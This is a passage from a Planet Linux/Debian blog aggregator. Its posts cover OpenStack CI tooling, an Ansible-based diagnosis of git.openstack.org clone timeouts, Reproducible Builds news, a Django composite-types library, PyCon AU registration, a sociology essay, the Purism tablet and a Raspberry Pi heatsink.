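    worker.addServer('zuul.example.org')    # the gearman server zuul talks to
    worker.registerFunction('build:gate-real-db-upgrade_nova_mysql')

    while True:
        job = worker.getJob()               # blocks until zuul hands us a job
        args = json.loads(job.arguments)    # change ref, project, pipeline, etc.
        job.sendWorkComplete(json.dumps(run_migrations(args)))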

At the moment turbo-hipster is still under heavy development but I hope to have it reporting results back to gerrit patchsets soon as part of zuuls report summary. For the moment I have a separate zuul instance running to test new nova patches and email the results back to me. Here is an example result report:

<code>Build succeeded.

- http://thw01.rcbops.com/logviewer/?q=/results/47/47162/9/check/gate-real-db-upgrade_nova_mysql/c4bc35c/index.html : SUCCESS in 13m 31s
</code>

Turbo Hipster Meme

*The name was randomly generated and does not necessarily contain meaning.

Planet Linux AustraliaJoshua Hesketh: git.openstack.org adventures

Over the past few months I started to notice occasional issues when cloning repositories (particularly nova) from git.openstack.org.

It would fail with something like

git clone -vvv git://git.openstack.org/openstack/nova .
fatal: The remote end hung up unexpectedly
fatal: early EOF
fatal: index-pack failed

The problem would occur sporadically during our 3rd party CI runs causing them to fail. Initially these went somewhat ignored as rechecks on the jobs would succeed and the world would be shiny again. However, as they became more prominent the issue needed to be addressed.

When a patch merges in gerrit it is replicated out to 5 different cgit backends (git0[1-5].openstack.org). These are then balanced by two HAProxy frontends which are on a simple DNS round-robin.

                          +-------------------+
                          | git.openstack.org |
                          |    (DNS Lookup)   |
                          +--+-------------+--+
                             |             |
                    +--------+             +--------+
                    |           A records           |
+-------------------v----+                    +-----v------------------+
| git-fe01.openstack.org |                    | git-fe02.openstack.org |
|   (HAProxy frontend)   |                    |   (HAProxy frontend)   |
+-----------+------------+                    +------------+-----------+
            |                                              |
            +-----+                                    +---+
                  |                                    |
            +-----v------------------------------------v-----+
            |    +---------------------+  (source algorithm) |
            |    | git01.openstack.org |                     |
            |    |   +---------------------+                 |
            |    +---| git02.openstack.org |                 |
            |        |   +---------------------+             |
            |        +---| git03.openstack.org |             |
            |            |   +---------------------+         |
            |            +---| git04.openstack.org |         |
            |                |   +---------------------+     |
            |                +---| git05.openstack.org |     |
            |                    |  (HAProxy backend)  |     |
            |                    +---------------------+     |
            +------------------------------------------------+

Reproducing the problem was difficult. At first I was unable to reproduce locally, or even on an isolated turbo-hipster run. Since the problem appeared to be specific to our 3rd party tests (little evidence of it in 1st party runs) I started by adding extra debugging output to git.

We were originally cloning repositories via the git:// protocol. The debugging information was unfortunately limited and provided no useful diagnosis. Switching to https allowed for more CURL output (when using GIT_CURL_VERBOSE=1 and GIT_TRACE=1) but this in itself just created noise. It actually took me a few days to remember that the servers are running arbitrary code anyway (a side effect of testing) and therefore cloning from the potentially insecure http protocol didn’t provide any further risk.

Over http we got a little more information, but still nothing that was conclusive at this point:

git clone -vvv http://git.openstack.org/openstack/nova .

error: RPC failed; result=18, HTTP code = 200
fatal: The remote end hung up unexpectedly
fatal: protocol error: bad pack header

After a bit it became more apparent that the problems would occur mostly during high (patch) traffic times. That is, when a lot of tests need to be queued. This led me to think that either the network turbo-hipster was on was flaky when doing multiple git clones in parallel or the git servers were flaky. The lack of similar upstream failures led me to initially think it was the former. In order to reproduce I decided to use Ansible to do multiple clones of repositories and see if that would uncover the problem. If needed I would have then extended this to orchestrating other parts of turbo-hipster in case the problem was symptomatic of something else.

Firstly I needed to clone from a bunch of different servers at once to simulate the network failures more closely (rather than doing multiple clones on the one machine or from the one IP in containers for example). To simplify this I decided to learn some Ansible to launch a bunch of nodes on Rackspace (instead of doing it by hand).

Using the pyrax module I put together a crude playbook to launch a bunch of servers. There is likely much neater and better ways of doing this, but it suited my needs. The playbook takes care of placing appropriate sshkeys so I could continue to use them later.

    ---
    - name: Create VMs
      hosts: localhost
      vars:
        ssh_known_hosts_command: "ssh-keyscan -H -T 10"
        ssh_known_hosts_file: "/root/.ssh/known_hosts"
      tasks:
        - name: Provision a set of instances
          local_action:
            module: rax
            name: "josh-testing-ansible"
            flavor: "4"
            image: "Ubuntu 12.04 LTS (Precise Pangolin) (PVHVM)"
            region: "DFW"
            count: "15"
            group: "raxhosts"
            wait: yes
          register: raxcreate

        - name: Add the instances we created (by public IP) to the group 'raxhosts'
          local_action:
            module: add_host
            hostname: "{{ item.name }}"
            ansible_ssh_host: "{{ item.rax_accessipv4 }}"
            ansible_ssh_pass: "{{ item.rax_adminpass }}"
            groupname: raxhosts
          with_items: raxcreate.success
          when: raxcreate.action == 'create'

        - name: Sleep to give time for the instances to start ssh
          #there is almost certainly a better way of doing this
          pause: seconds=30

        - name: Scan the host key
          shell: "{{ ssh_known_hosts_command}} {{ item.rax_accessipv4 }} >> {{ ssh_known_hosts_file }}"
          with_items: raxcreate.success
          when: raxcreate.action == 'create'

    - name: Set up sshkeys
      hosts: raxhosts
      tasks:
       - name: Push root's pubkey
         authorized_key: user=root key="{{ lookup('file', '/root/.ssh/id_rsa.pub') }}"

From here I can use Ansible to work on those servers using the rax inventory. This allows me to address any nodes within my tenant and then log into them with the seeded sshkey.

The next step of course was to run tests. Firstly I just wanted to reproduce the issue, so in order to do that it would crudely set up an environment where it can simply clone nova multiple times.

    ---
    - name: Prepare servers for git testing
      hosts: josh-testing-ansible*
      serial: "100%"
      tasks:
        - name: Install git
          apt: name=git state=present update_cache=yes
        - name: remove nova if it is already cloned
          shell: 'rm -rf nova'

    - name: Clone nova and monitor tcpdump
      hosts: josh-testing-ansible*
      serial: "100%"
      tasks:
        - name: Clone nova
          shell: "git clone http://git.openstack.org/openstack/nova"

By default Ansible runs with 5 forked processes, meaning that Ansible would work on 5 servers at a time. We want to exercise git heavily (in the same way turbo-hipster does) so we use the --forks param to run the clone on all the servers at once. The plan was to keep launching servers until the error reared its head from the load.

To my surprise this happened with very few nodes (less than 15, but I left that as my minimum testing). To confirm I also ran the tests after launching further nodes to see it fail at 50 and 100 concurrent clones. It turned out that the more I cloned the higher the failure rate percentage was.

Now that I had the problem reproducing, it was time to do some debugging. I modified the playbook to capture tcpdump information during the clone. Initially git was cloning over IPv6 so I turned that off on the nodes to force IPv4 (just in case it was a v6 issue, but the problem did present itself on both networks). I also locked git.openstack.org to one IP rather than randomly hitting both front ends.

    ---
    - name: Prepare servers for git testing
      hosts: josh-testing-ansible*
      serial: "100%"
      tasks:
        - name: Install git
          apt: name=git state=present update_cache=yes
        - name: remove nova if it is already cloned
          shell: 'rm -rf nova'

    - name: Clone nova and monitor tcpdump
      hosts: josh-testing-ansible*
      serial: "100%"
      vars:
        cap_file: tcpdump_{{ ansible_hostname }}_{{ ansible_date_time['epoch'] }}.cap
      tasks:
        - name: Disable ipv6 1/3
          sysctl: name="net.ipv6.conf.all.disable_ipv6" value=1 sysctl_set=yes
        - name: Disable ipv6 2/3
          sysctl: name="net.ipv6.conf.default.disable_ipv6" value=1 sysctl_set=yes
        - name: Disable ipv6 3/3
          sysctl: name="net.ipv6.conf.lo.disable_ipv6" value=1 sysctl_set=yes
        - name: Restart networking
          service: name=networking state=restarted
        - name: Lock git.o.o to one host
          lineinfile: dest=/etc/hosts line='23.253.252.15 git.openstack.org' state=present
        - name: start tcpdump
          command: "/usr/sbin/tcpdump -i eth0 -nnvvS -w /tmp/{{ cap_file }}"
          async: 6000000
          poll: 0 
        - name: Clone nova
          shell: "git clone http://git.openstack.org/openstack/nova"
          #shell: "git clone http://github.com/openstack/nova"
          ignore_errors: yes
        - name: kill tcpdump
          command: "/usr/bin/pkill tcpdump"
        - name: compress capture file
          command: "gzip {{ cap_file }} chdir=/tmp"
        - name: grab captured file
          fetch: src=/tmp/{{ cap_file }}.gz dest=/var/www/ flat=yes

This gave us a bunch of compressed capture files that I was then able to seek the help of my colleagues to debug (a particular thanks to Angus Lees). The results from an early run can be seen here: http://119.9.51.216/old/run1/

Gus determined that the problem was due to a RST packet coming from the source at roughly 60 seconds. This indicated it was likely we were hitting a timeout at the server or a firewall during the git-upload-pack of the clone.

The solution turned out to be rather straightforward. The git-upload-pack had simply grown too large and would timeout depending on the load on the servers. There was a timeout in apache as well as the HAProxy config for both frontend and backend responsiveness. The relevant patches can be found at https://review.openstack.org/#/c/192490/ and https://review.openstack.org/#/c/192649/

While upping the timeout avoids the problem, certain projects are clearly pushing the infrastructure to its limits. As such a few changes were made by the infrastructure team (in particular James Blair) to improve git.openstack.org’s responsiveness.

Firstly git.openstack.org is now a higher performance (30GB) instance. This is a large step up from the previous (8GB) instances that were used as the frontend previously. Moving to one frontend additionally meant the HAProxy algorithm could be changed to leastconn to help balance connections better (https://review.openstack.org/#/c/193838/).

                          +--------------------+
                          | git.openstack.org  |
                          | (HAProxy frontend) |
                          +----------+---------+
                                     |
                                     |
            +------------------------v------------------------+
            |  +---------------------+  (leastconn algorithm) |
            |  | git01.openstack.org |                        |
            |  |   +---------------------+                    |
            |  +---| git02.openstack.org |                    |
            |      |   +---------------------+                |
            |      +---| git03.openstack.org |                |
            |          |   +---------------------+            |
            |          +---| git04.openstack.org |            |
            |              |   +---------------------+        |
            |              +---| git05.openstack.org |        |
            |                  |  (HAProxy backend)  |        |
            |                  +---------------------+        |
            +-------------------------------------------------+

All that was left was to see if things had improved. I reran the test across 15, 30 and then 45 servers. These were all able to clone nova reliably where they had previously been failing. I then upped it to 100 servers where the cloning began to fail again.

Post-fix logs for those interested:
http://119.9.51.216/run15/
http://119.9.51.216/run30/
http://119.9.51.216/run45/
http://119.9.51.216/run100/
http://119.9.51.216/run15per100/

At this point, however, I’m basically performing a Distributed Denial of Service attack against git. As such, while the servers aren’t immune to a DDoS the problem appears to be fixed.

Planet Linux AustraliaMichael Still: Potato Point

I went to Potato Point with the Scouts for a weekend wide game. Very nice location, apart from the ticks!

                                       

Tags for this post: blog pictures 20160523 photo coast scouts bushwalk
Related posts: Exploring the Jagungal; Scout activity: orienteering at Mount Stranger

Planet Linux AustraliaRichard Jones: PyCon Australia 2016: Registration Opens!

We are delighted to announce that online registration is now open for PyCon Australia 2016. The seventh PyCon Australia, being held in Melbourne, Victoria from August 12th – 16th at the Melbourne Convention and Exhibition Centre, will draw hundreds of Python developers, enthusiasts and students from Australasia and afar.

Starting today, early bird offers are up for grabs. To take advantage of these discounted ticket rates, be among the first 90 to register. Early bird registration starts from $60 for full-time students, $190 for enthusiasts and $495 for professionals. Offers this good won’t last long, so register right away.

We strongly encourage attendees to organise their accommodation as early as possible, as demand for cheaper rooms is very strong during the AFL season.

PyCon Australia has endeavoured to keep tickets as affordable as possible. Financial assistance is also available: for information about eligibility, head to our financial assistance page and apply. We are able to make such offers thanks to our Sponsors and Contributors.

To begin the registration process, and find out more about each level of ticket, visit our registration information page.

Important Dates to Help You Plan

  • 22 May: Registration opens - ‘Early bird’ prices for the first 90 tickets
  • 17 June: Last day to apply for financial assistance
  • 26 June: Last day to purchase conference dinner tickets
  • 9 July: Last day to order conference t-shirts
  • 12 August: PyCon Australia 2016 begins!

About PyCon Australia

PyCon Australia is the national conference for the Python programming community. The seventh PyCon Australia will be held on August 12-16 2016 in Melbourne, bringing together professional, student and enthusiast developers with a love for programming in Python. PyCon Australia informs the country’s developers with presentations by experts and core developers of Python, as well as the libraries and frameworks that they rely on.

To find out more about PyCon Australia 2016, visit our website at pycon-au.org, follow us at @pyconau or e-mail us at contact@pycon-au.org.

PyCon Australia is presented by Linux Australia (www.linux.org.au) and acknowledges the support of our Platinum Sponsors, DevDemand.co and IRESS; and our Gold sponsors, Google Australia and Optiver. For full details of our sponsors, see our website.

Planet Debian: Reproducible builds folks: Reproducible builds: week 56 in Stretch cycle

What happened in the Reproducible Builds effort between May 15th and May 21st 2016:

Media coverage

Blog posts from our GSoC and Outreachy contributors:

Documentation update

Ximin Luo clarified instructions on how to set SOURCE_DATE_EPOCH.
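
For readers unfamiliar with the variable, here is a minimal, illustrative Python sketch (not taken from the clarified instructions) of how a build tool might honour SOURCE_DATE_EPOCH instead of the current time:

import os
import time

# Use SOURCE_DATE_EPOCH (seconds since the epoch) when it is set, so that
# rebuilding the same source embeds the same timestamp.
build_time = int(os.environ.get('SOURCE_DATE_EPOCH', time.time()))

# Timestamps newer than SOURCE_DATE_EPOCH should be clamped down to it.
mtime = os.path.getmtime(__file__)
clamped = min(mtime, build_time)

print(time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(build_time)))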

Toolchain fixes

  • Joao Eriberto Mota Filho uploaded txt2man/1.5.6-4, which honours SOURCE_DATE_EPOCH to generate reproducible manpages (original patch by Reiner Herrmann).
  • Dmitry Shachnev uploaded sphinx/1.4.1-1 to experimental with improved support for SOURCE_DATE_EPOCH (original patch by Alexis Bienvenüe).
  • Emmanuel Bourg submitted a patch against debhelper to use a fixed username while building ant packages.

Other upstream fixes

  • Doxygen merged a patch by Ximin Luo, which uses UTC as timezone for embedded timestamps.
  • CMake applied a patch by Reiner Herrmann in their next branch, which sorts file lists obtained with file(GLOB).
  • GNU tar 1.29 with support for --clamp-mtime has been released upstream, closing #816072, which was the blocker for #759886 "dpkg-dev: please make mtimes of packaged files deterministic", which we now hope will be closed soon.

Packages fixed

The following 18 packages have become reproducible due to changes in their build dependencies: abiword angband apt-listbugs asn1c bacula-doc bittornado cdbackup fenix gap-autpgrp gerbv jboss-logging-tools invokebinder modplugtools objenesis pmw r-cran-rniftilib x-loader zsnes

The following packages have become reproducible after being fixed:

Some uploads have fixed some reproducibility issues, but not all of them:

  • bzr/2.7.0-6 by Jelmer Vernooij.
  • libsdl2/2.0.4+dfsg2-1 by Manuel A. Fernandez Montecelo.
  • pvm/3.4.5-13 by James Clarke.
  • refpolicy/2:2.20140421-11 by Laurent Bigonville.
  • subvertpy/0.9.3-4 by Jelmer Vernooij.

Patches submitted that have not made their way to the archive yet:

  • #824413 against binutils by Chris Lamb: filter build user and date from test log case-insensitively
  • #824452 against python-certbot by Chris Lamb: prevent PID from being embedded into documentation (forwarded upstream)
  • #824453 against gtk-gnutella by Chris Lamb: use SOURCE_DATE_EPOCH for deterministic timestamp (merged upstream)
  • #824454 against python-latexcodec by Chris Lamb: fix for parsing the changelog date
  • #824472 against torch3 by Alexis Bienvenüe: sort object files while linking
  • #824501 against cclive by Alexis Bienvenüe: use SOURCE_DATE_EPOCH as embedded build date
  • #824567 against tkdesk by Alexis Bienvenüe: sort order of files which are parsed by mkindex script
  • #824592 against twitter-bootstrap by Alexis Bienvenüe: use shell-independent printing
  • #824639 against openblas by Alexis Bienvenüe: sort object files while linking
  • #824653 against elkcode by Alexis Bienvenüe: sort list of files locale-independently
  • #824668 against gmt by Alexis Bienvenüe: use SOURCE_DATE_EPOCH for embedded timestamp (similar patch by Bas Couwenberg already applied and forwarded upstream)
  • #824808 against gdal by Alexis Bienvenüe: sort object files while linking
  • #824951 against libtomcrypt by Reiner Herrmann: use SOURCE_DATE_EPOCH for timestamp embedded into metadata

Reproducibility-related bugs filed:

  • #824420 against python-phply by ceridwen: parsetab.py file is not included when building with DEB_BUILD_OPTIONS="nocheck"
  • #824572 against dpkg-dev by Ximin Luo: request to export SOURCE_DATE_EPOCH in /usr/share/dpkg/*.mk.

Package reviews

51 reviews have been added, 19 have been updated and 15 have been removed in this week.

22 FTBFS bugs have been reported by Chris Lamb, Santiago Vila, Niko Tyni and Daniel Schepler.

tests.reproducible-builds.org

Misc.

  • During the discussion on debian-devel about PIE, an archive rebuild was suggested by Bálint Réczey, and Holger Levsen suggested to coordinate this with a required archive rebuild for reproducible builds.
  • Ximin Luo improved misc.git/reports (=the tools to help writing the weekly statistics for this blog) quite a bit, h01ger contributed a little too.

This week's edition was written by Reiner Herrmann and Holger Levsen and reviewed by a bunch of Reproducible builds folks on IRC.

Planet Debian: Antonio Terceiro: Adopting pristine-tar

As of yesterday, I am the new maintainer of pristine-tar. As it is the case for most of Joey Hess’ creations, it is an extremely useful tool, and used in a very large number of Debian packages which are maintained in git.

My first upload was mostly of a terrain-reconnaissance nature: I did some housekeeping tasks, such as making the build idempotent and making sure all binaries are built with security hardening flags, and wrote a few automated test cases to serve as a build-time and run-time regression test suite. No functional changes have been made.

As Joey explained when he orphaned it, there are a few technical challenges involved in making sure pristine-tar stays useful in the future. Although I did read some of the code, I am not particularly familiar with the internals yet, and will be more than happy to get co-maintainers. If you are interested, please get in touch. The source git repository is right there.

Planet Linux Australia: Danielle Madeley: Django and PostgreSQL composite types

PostgreSQL has this nifty feature called composite types that you can use to create your own types from the built-in PostgreSQL types. It’s a bit like hstore, only structured, which makes it great for structured data that you might reuse multiple times in a model, like addresses.

Unfortunately, to date they have been pretty much a pain to use in Django. There were some older implementations for versions of Django before 1.7, but they tended to do things like create surprise new objects in the namespace, not be migratable, and require a connection to the DB at all times (i.e. even during your build).

Anyway, after reading a bunch of their implementations and then the Django source code I wrote django-postgres-composite-types.

Install with:

pip install django-postgres-composite-types

Then you can define a composite type declaratively:

from django.db import models
from postgres_composite_type import CompositeType


class Address(CompositeType):
    """An address."""

    address_1 = models.CharField(max_length=255)
    address_2 = models.CharField(max_length=255)

    suburb = models.CharField(max_length=50)
    state = models.CharField(max_length=50)

    postcode = models.CharField(max_length=10)
    country = models.CharField(max_length=50)

    class Meta:
        db_type = 'x_address'  # Required

And use it in a model:

class Person(models.Model):
    """A person."""

    address = Address.Field()
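
As a rough usage sketch (assuming the composite type can be instantiated with its fields as keyword arguments; this is an illustration, not copied from the project's documentation):

person = Person(
    address=Address(
        address_1='12 Example Street',
        address_2='',
        suburb='Fitzroy',
        state='VIC',
        postcode='3065',
        country='Australia',
    )
)
person.save()
print(person.address.suburb)  # composite fields are accessed as attributes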

The field should provide all of the things you need, including formfield etc., and you can even inherit from this field to extend it in your own way:

class AddressField(Address.Field):
    def __init__(self, in_australia=True, **kwargs):
        self.in_australia = in_australia

        super().__init__(**kwargs)

Finally, to set up the DB there is a migration operation that will create the type, which you can add:

import address
from django.db import migrations


class Migration(migrations.Migration):

    operations = [
        # Registers the type
        address.Address.Operation(),
        migrations.AddField(
            model_name='person',
            name='address',
            field=address.Address.Field(blank=True, null=True),
        ),
    ]

It’s not smart enough to add it itself (can you do that?). Nor would it be smart enough to write the operations to alter a type. That would be a pretty cool trick. But it’s useful functionality all the same, especially when the alternative is creating lots of 1:1 models that are hard to work with and hard to garbage collect.

It’s still pretty early days, so the APIs are subject to change. PRs accepted of course.


Planet Linux Australia: Maxim Zakharov: Restoring gitstats

The gitstats tool stopped working on our project after an upgrade to Ubuntu 16.04. I have finally got time to have a look. There were two issues with it:

  1. We do not need to call the process's wait(): communicate() already waits for process termination, the last process in the pipeline does not finish until all processes before it in the pipeline terminate, and wait() may deadlock on pipes with huge output (see the notice at https://docs.python.org/2/library/subprocess.html and the sketch below).
  2. On Ubuntu 16.04, grep has started writing a "Binary file (standard input) matches" notice into the pipe, which breaks parsing.
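
A minimal sketch of the first point (illustrative only, not the actual gitstats code):

import subprocess

# Read a shell pipeline's output with communicate(), which drains stdout and
# waits for termination, instead of wait(), which can deadlock once the child
# fills the pipe buffer.
p = subprocess.Popen('git rev-list --all | wc -l',
                     shell=True, stdout=subprocess.PIPE)
output, _ = p.communicate()
print(int(output))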

I have made a pull request which fixes these issues: https://github.com/hoxu/gitstats/pull/65
You can also clone the fixed version from my account: https://github.com/Maxime2/gitstats

Planet Debian: Petter Reinholdtsen: French edition of Lawrence Lessig's book Cultura Libre on Amazon and Barnes & Noble

A few weeks ago the French paperback edition of Lawrence Lessig's 2004 book Cultura Libre was published. Today I noticed that the book is now available from book stores. You can now buy it from Amazon ($19.99), Barnes & Noble ($?) and as always from Lulu.com ($19.99). The revenue is donated to the Creative Commons project. If you buy from Lulu.com, they currently get $10.59, while if you buy from one of the book stores most of the revenue goes to the book store and the Creative Commons project gets much less (I am not sure how much less).

I was a bit surprised to discover that there is a kindle edition sold by Amazon Digital Services LLC on Amazon. Not quite sure how that edition was created, but if you want to download an electronic edition (PDF, EPUB, Mobi) generated from the same files used to create the paperback edition, they are available from github.


Sociological Images: Is the “Mrs. Degree” Dead?

Assigned: Life with Gender is a new anthology featuring blog posts by a wide range of sociologists writing at The Society Pages and elsewhere. To celebrate, we’re re-posting four of the essays as this month’s “flashback Fridays.” Enjoy! And to learn more about this anthology, a companion to Wade and Ferree’s Gender: Ideas, Interactions, Institutions, please click here.


Is the “Mrs. Degree” Dead?, by Laura Hamilton, PhD

In 1998 I was a first-year student at DePauw University, a small liberal arts college in Indiana. A floor-mate of mine, with whom I hung out occasionally, told me over lunch that she was at college primarily to find a “good husband.” I nearly choked on my sandwich. I had assumed that the notion of the “Mrs. Degree” was a relic of my parents’ era—if not my grandparents’. Surely it had gone the way of the home economics major and women’s dormitory curfews.

Photo via clemsonunivlibrary flickr creative commons

Years later, I — along with my co-director, Elizabeth A. Armstrong — would embark on a five year ethnographic and longitudinal study of a dormitory floor of women at a public flagship in the Midwest. As part of my dissertation, I also interviewed the women’s parents. What I found brought me back to my first year of college. A subset of parents wanted their daughters to be “cookie-baking moms”—not successful lawyers, doctors, or businesswomen. They espoused gender complementarity—a cultural model of how women should achieve economic security that relied on a co-constructed pairing of traditional femininity and masculinity. That is, men were to be economic providers and women supportive homemakers. This was a revised “Mrs.” Degree, in the sense that marriage during college, or even right after, was not desirable. College women were to build the traits and social networks that would hopefully land them a successful husband eventually, but it was assumed best to wait until men had proven themselves in the labor market before entering a marriage.

This was not the only cultural model to which women on the floor were exposed. In fact, those coming in primed for complementarity were in the minority. However, as I show in my article, “The Revised MRS: Gender Complementarity at College,” far more women left college leaning toward gender complementarity than their previous gender socialization suggested. Something was happening on the college campus — where women were, ironically, out-achieving men — that shifted them toward performing an affluent, white, and heterosexual femininity, marked by an emphasis on appearance, accommodation to men, and a bubbly personality.

I argue that gender complementarity is not just a characteristic of individual women, but is actually encouraged by the institutional and interactional features of the typical, four-year, public state school. Midwest U, like other schools of its kind, builds a social and academic infrastructure well-suited to high-paying, out-of-state students interested in partying. The predominately white Greek system — a historically gender-, class-, and racially-segregated institution — enjoys prominence on campus. An array of “easy” majors, geared toward characteristics developed outside of the classroom, allow women to leverage personality, looks, and social skills in the academic sphere. These supports make it possible for peer cultures in which gender complementarity is paramount to thrive. Women who want to belong and make friends find it hard — if not impossible — to avoid the influence of the dominant social scene on campus, located in fraternities and Greek-oriented bars.

This structure of campus life is not incidental. In recent years, cuts to state and federal support for higher education have led mid-tier public institutions like Midwest U to cater to the socially-oriented and out-of-state students who arrive with gender complementarity interests. These class-based processes have implications for the type of social and academic climate that all students find upon arriving at Midwest University.

The problem is, however, that most women need to accrue the skills and credentials that translate into a solid career. An institution supporting gender complementarity does them a serious disservice — potentially contributing to gendered differences in pay after college. The situation is particularly problematic for students not from the richest of families: Affluent women espousing complementarity form the type of networks that give them reasonable hope of rescue by a high-credentialed spouse, and heavy parental support means that they can afford to be in big cities where they mix and mingle with the “right” men. Women from less affluent backgrounds lack these resources, and are often reliant on their own human capital to make it after college.

The gradual shift from higher education as a public good — funded heavily by the state — to a private commodity — for sale to the highest bidder — has significantly stalled not only progress toward class equality, but certain forms of gender equality as well. Change is going to require unlinking the solvency of organizations like Midwest U from the interests of those who can afford, and thus demand, an exclusionary and highly gendered social experience.

Laura T. Hamilton, PhD is an assistant professor of sociology at the University of California, Merced. Her recently published article, “The Revised MRS: Gender Complementarity at College,” appears in the April 2014 issue of Gender & Society; this post originally appeared at their blog. She is the author of Parenting to a Degree: How Family Matters for College Women’s Success and, with Elizabeth Armstrong, Paying for the Party: How Colleges Maintain Inequality.

(View original at https://thesocietypages.org/socimages)

Planet Debian: Zlatan Todorić: 4 months of work turned into GNOME, Debian testing based tablet

Huh, where do I start? I started working for a great CEO and a great company known as Purism. What is so great about it? First of all, the CEO (Todd Weaver) is incredibly passionate about Free software. Yes, you read that correctly. Free software. Not the Open Source definition, but the Free software definition. I want to repeat this like a mantra. At Purism we try to integrate high-end hardware with Free software. Not only that, we want our hardware to be as Free as possible. No, we want to make it entirely Free, but at the moment we don't achieve that. So instead of going the way of using older hardware (as Ministry of Freedom does, and kudos to them for making such an option available), we sacrifice this bit for the momentum we hope to gain - momentum brings growth, and growth brings us a much better position when we sit at the negotiation table with hardware producers. If negotiations fail, with growth we will still have enough chances to heavily invest in things such as openRISC or freeing cellular modules. We want to provide, in future, an entirely Free hardware & software device with an integrated security and privacy focus that is as easy to use and convenient as any other mainstream OS. And we choose to currently sacrifice a few things to stay in the loop.

Surely that can't be the only thing - and it isn't. Our current hardware runs entirely on Free software. You can install Debian main on it and all will work out of the box. I know, I did this, and I enjoy my Debian more than ever. We also have a margin share program where part of the profit is donated to Free software projects. We are also discussing a new business model where our community will get a lot of influence (stay tuned for this). Besides all this, our OS (called PureOS - yes, a bit of a misfortune that we took the name of a dormant distribution) was Trisquel based but is now Debian testing based. The current PureOS 2.0 comes with Cinnamon as the default DE, but we are already baking PureOS 3.0, which is going to come with GNOME Shell as the default.

Why is this important? Well, around 12 hours ago we launched a tablet campaign on Indiegogo for a tablet which comes with GNOME Shell and PureOS as default. Not one, but two tablets actually (although we heavily focus on the 11" one). This is the product of my 4 months of dedicated work at Purism. I must give kudos to all the Purism members who pushed their parts in preparation for this campaign. It was a hell of a ride.

Librem11

I have also approached (of course!) Debian about the creation of OEM installation ISOs for our Librem products. This way, with every sold Librem that ships with Debian preinstalled, Debian will get a donation. It is our way to show gratitude to Debian for all the work our community does (yes, I am still an extremely proud Debian dude and I will stay like that!). Oh yes, I am the chief technology person at Purism, and besides all the goals we have, I also plan (dream) about Purism being the company that has the highest number of Debian Developers. In those terms I am very proud to say that Matthias Klumpp became part of Purism. Hopefully we will soon extend the Debian population at Purism.

Of course, I think it is fairly well known that I am easy to approach, so if anyone has any questions (as I didn't want this post to be too long) feel free to contact me. Also - in the Free software spirit - we welcome any community engagement, suggestions and/or feedback.

Worse Than Failure: Error'd: Error'd in Time and Space

Anonymous went to configure some settings and found his options were a little constrained.

A prompt that warns you to choose any value between 8 and 8

Fortunately, real numbers are a continuum, so Anonymous has an infinite number of possible values to choose from.

Kaylee was poking through a codebase and found this DLL, which leaves us with so many questions.

A code base with one DLL marked 'ExternalWeb.InternalExternal'

We’re left feeling inside out, and perhaps a bit unmoored in time…

We’re losing track of time… how old are we? Benji found that question far more difficult to answer than normal…

A drop-down list with options like '25-25', '25-35'

Then again, it’s hard not to lose track of time. Time and space are a continuum, and movements through space are also movements through time, and vice versa. Ricardo sends us this Italian train schedule:

A train schedule where the 'km' field has been formatted as dates instead of numbers

If you don’t read Italian, pay close attention to the ‘km’ field- which is measured in dates, apparently.

As we all learned in Back to the Future III, trains are incredibly useful devices for time travel. As any time traveler knows, representing dates and times when you’re crossing history is a challenge. Nick stepped aboard the wrong train, and who knows when he might be now?

An animated image where the message '2015 NOV 97 86::3PM' scrolls across a train's LED display

This all gets so confusing. Is there some sort of error code we could report about all of this? Larry, do you have anything? Oh, you do?

A FoxPro error 'Fatal Error 104 when trying to report error 104'


Planet Linux Australia: Glen Turner: Heatsink for RPi3

I ordered a passive heatsink for system-on-chip of the Raspberry Pi 3 model B. Since it fits well I'll share the details:

Order

  • Fischer Elektronik ICK S 14 X 14 X 10 heatsink (Element 14 catalogue 1850054, AUD3.70).

  • Fischer Elektronik WLFT 404 23X23 thermally conductive foil, adhesive (Element 14 catalogue 1211707, AUD2.42 ).

Install

To install you need these parts: two lint-free isopropyl alcohol swabs; and these tools: a sharp craft knife and an anti-static wrist strap.

Prepare the heatsink: Swab the base of the heatsink. Wait for it to dry. Remove the firm clear plastic from the thermal foil, taking care not to get fingerprints in the centre of the exposed sticky side. Put the foil on the bench, sticky side up. Plonk the heatsink base onto the sticky side, rolling slightly to avoid air bubbles and then pressing hard. Trim around the edges of the heatsink with the craft knife.

Prepare the Raspberry Pi 3 system-on-chip: Unplug everything from the RPi3, turn off the power, wait a bit, plug the USB power lead back in but don't reapply power (this gives us a ground reference). If the RPi3 is in a case, just remove the lid. Attach the wrist strap and clamp it to the ethernet port surround or some other convenient ground. Swab the largest of the chips on the board, ensuring no lint remains.

Attach heat sink: Remove the plastic protection from the thermal foil, exposing the other sticky side. Do not touch the sticky side. With care place the heatsink squarely and snugly on the chip. Press down firmly with a finger of your grounded hand for a few seconds. Don't press too hard: we're just ensuring the glue binds.

Is it worth it?

This little passive heatsink won't stop the RPi3 from throttling under sustained full load, despite this being one of the more effective passive heatsinks on the market. You'll need a fan blowing air across the heatsink to prevent that happening, and you might well need a heatsink on the RAM too.

But the days of CPUs being able to run at full rate continuously are numbered. Throttling the CPU performance under load is common in phones and tablets, and is not rare in laptops.

What the heatsink allows is a delay to the moment of throttling. So a peaky load has more chance of not causing throttling. Since we're only talking AUD6.12 in parts, a passive heatsink is worth it if you are going to use the RPi3 for serious purposes.

Of course the heatsink is also a more effective radiator. When running cpuburn-a53 the CPU core temperature stabilises at 80C with a CPU clock of 700MHz (out of 1200MHz). It's plain that 80C is the target core temperature for this version of the RPi3's firmware. That's some 400MHz higher than without the heatsink. But if your task needs sustained raw CPU performance then you are much better off with even the cheapest of desktops, let alone a server.
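
If you want to watch the throttling behaviour for yourself, a small monitoring sketch along these lines may help (the sysfs paths are the ones typically exposed on Raspbian and should be treated as assumptions):

import time

def read_int(path):
    with open(path) as f:
        return int(f.read().strip())

while True:
    # Core temperature is reported in millidegrees, clock in kHz.
    temp_c = read_int('/sys/class/thermal/thermal_zone0/temp') / 1000.0
    mhz = read_int('/sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq') / 1000.0
    print('core temp %.1fC, clock %.0fMHz' % (temp_c, mhz))
    time.sleep(2)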

Planet Linux Australia: Steven Hanley: [mtb/events] UTA100 - The big dance through the Blue Mountains again

Back at Ultra Trail Australia running through the Blue Mountains wilderness

